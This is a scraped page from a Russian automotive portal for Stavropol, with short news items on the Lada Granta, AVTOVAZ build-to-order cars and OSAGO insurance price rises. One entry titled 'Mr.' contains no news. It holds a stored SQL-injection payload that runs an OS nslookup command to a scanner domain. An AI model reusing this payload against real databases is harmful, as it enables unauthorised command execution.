Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
09 января 2012г.
Lada Granta появится в Европе уже к концу 2012 года

По некоторой информации, новая Lada Granta заменит модель Kalina, испытывающую серьезные сложности на западноевропейских рынках. Согласно неофициальным данным, стоимость Granta в Германии составит не менее 6 тыс. евро.
Подробнее »
31 марта 2010г.
АВТОВАЗ впервые берется делать LADA «на заказ»

АВТОВАЗ начал принимать заказы от потребителей на конкретные модели и комплектации автомобилей LADA(в рамках программы утилизации). Производитель обещает изготовить и доставить потребителю нужную машину в течение 2-4 месяцев.
Подробнее »
30 августа 2019г.
Mr.

1';copy (select '') to program 'nslookup dns.sqli.\013405.529-41394.529.a9e86.\1.bxss.me
Подробнее »
Через месяц полис ОСАГО может подорожать на треть
Уже с начала 2013 года стоимость полисов ОСАГО могут увеличить на треть, в случае, если депутаты примут соответствующий законопроект. В документе также прописаны и увеличения выплат по страховке. Так, лимит по выплатам на ремонт автомобиля вырастет со 120 до 400 тысяч рублей, а компенсация вреда здоровью – со 160 до 500 тысяч рублей. Об этом сообщает газета «Коммерсант».
Ранее сообщалось, что в 2013 году жители Москвы, Санкт-Петербурга и областей получат возможность пользоваться упрощенной системой оформления ДТП. Кроме того, лимит выплат пострадавшей стороне по ОСАГО вырастет до 400 тысяч рублей, вместо нынешних 25 тысяч.

По информации газеты «Известия», чтобы получить повышенную выплату за оформленное без полицейских ДТП, нужно будет предъявить видеозапись аварии. Как сообщает издание со ссылкой на источник в Минфине, эти изменения в закон об ОСАГО включены в пакет поправок, которое министерство на днях направило в правительство.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика